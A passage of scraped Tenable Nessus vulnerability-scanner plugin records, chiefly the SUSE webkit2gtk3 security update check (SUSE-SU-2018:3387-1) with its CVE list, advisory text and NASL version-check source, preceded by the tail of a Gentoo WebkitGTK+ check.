script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201909-05\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.24.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8689\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.24.4\"), vulnerable:make_list(\"lt 2.24.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebkitGTK+\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:56:07", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank page.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the Web Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed quickly.\n\nFix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the &Atilde;&cent;&Acirc;&#128;&Acirc;&#156;system&Atilde;&cent;&Acirc;&#1 28;&Acirc;&#157; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some cases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via WebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and pixels.\n\nEnsure cookie operations take effect when they happen before a web process has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in WebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or not.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-3387-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118389", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n(boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof\nuser-interface information (about whether the entire content is\nderived from a valid TLS session) via a crafted website that sends a\n401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to\nexecute arbitrary code via special characters that trigger command\ninjection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers a\nWebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit'\ncomponent allowed attackers to trigger an assertion failure by\nleveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nwebsite (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a\ndenial of service (memory corruption) via a crafted website\n(bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain\nsensitive credential information that is transmitted during a CSS\nmask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (buffer overflow\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers an\n@generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages a\ngetWasmBufferFromValue out-of-bounds read during WebAssembly\ncompilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to\noverwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages type\nconfusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\nwebkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\nleading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability\nallowed remote attackers to inject arbitrary web script or HTML via a\ncrafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly\nfailed to use system proxy settings for WebSocket connections. As a\nresult, users could be deanonymized by crafted websites via a\nWebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to\nperform TLS certificate verification for WebSocket connections\n(bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash\nwhen atk_object_ref_state_set is called on an AtkObject that's being\ndestroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage\nof 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank\npage.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish\nthe load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the\nWeb Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to\nmissing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed\nquickly.\n\nFix a network process crash when load is cancelled while searching for\nstored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\ndisabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the\n&Atilde;&cent;&Acirc;&#128;&Acirc;&#156;system&Atilde;&cent;&Acirc;&#1\n28;&Acirc;&#157; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some\ncases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems\nwith broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\nsupport.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and\nlibwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated\ncompositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace\nwebkit_form_submission_request_get_text_fields() that is now\ndeprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate\nweb-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via\nWebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and\npixels.\n\nEnsure cookie operations take effect when they happen before a web\nprocess has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in\nWebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or\nnot.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13884/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 